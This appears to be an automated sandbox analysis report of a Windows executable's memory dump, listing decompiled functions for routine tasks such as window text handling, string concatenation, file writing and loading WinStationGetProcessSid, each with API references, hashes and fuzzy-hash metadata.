API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

cf@, xrefs: 0040352B
q, xrefs: 00403556

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

0x00405e0a
0x00405e12
0x00405e18
0x00405e1c
0x00405e1e
0x00405e1e
0x00405e24
0x00405e2c
0x00405e2e
0x00405e44
0x00405e49
0x00405e4c
0x00405e4d
0x00405e68
0x00405e74
0x00405e74
0x00000000
0x00405e84
0x00405e8c

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

WinStationGetProcessSid, xrefs: 00409A62
winsta.dll, xrefs: 00409A51
Y@, xrefs: 00409A46

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x0040588e
0x0040588f
0x0040588f
0x00405892
0x00405896
0x004058a9
0x004058a9
0x004058ad
0x004058af
0x004058b5
0x004058b6
0x004058b9
0x004058c2
0x004058c3
0x004058c8
0x004058d2
0x004058d4
0x004058d9
0x004058e0
0x004058ea
0x004058ec
0x004058ed
0x004058f2
0x004058f9
0x00405902
0x00405898
0x00405898
0x0040589a
0x0040589c
0x004058a1
0x004058a2
0x004058a5
0x004058a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a7
0x00405912
0x00405915
0x0040591e
0x0040591e
0x00405907
0x0040590b

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

0x0040ad06
0x0040ad0a
0x0040ad0c
0x0040ad14
0x0040ad19
0x0040ad1f
0x0040ad23
0x0040ad27
0x0040ad2a
0x0040ad2d
0x0040ad34
0x0040ad3b
0x0040ad3e
0x0040ad44
0x0040ad48
0x0040ad4a
0x0040ad52
0x0040ad5a
0x0040ad64
0x0040ad65
0x0040ad6b
0x0040ad6c
0x0040ad73
0x0040ad76
0x0040ad7c
0x0040ad7c
0x0040ad7f
0x0040ad84

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00404a62
0x00404a6a
0x00404a6e
0x00404a71
0x00404a74
0x00404a92
0x00404a92
0x00404a76
0x00404a76
0x00404a87
0x00404a90
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a90
0x00404aa3
0x00404aa7
0x00404aa7
0x00404a94
0x00404a98

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

0x0040b6a6
0x0040b6ad
0x0040b6af
0x0040b6b0
0x0040b6b5
0x0040b6b6
0x0040b6bd
0x0040b6bf
0x0040b6c0
0x0040b6c5
0x0040b6c6
0x0040b6cd
0x0040b6cf
0x0040b6d0
0x0040b6d5
0x0040b6d6
0x0040b6dd
0x0040b6df
0x0040b6e0
0x00000000
0x0040b6e5
0x0040b6e6

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

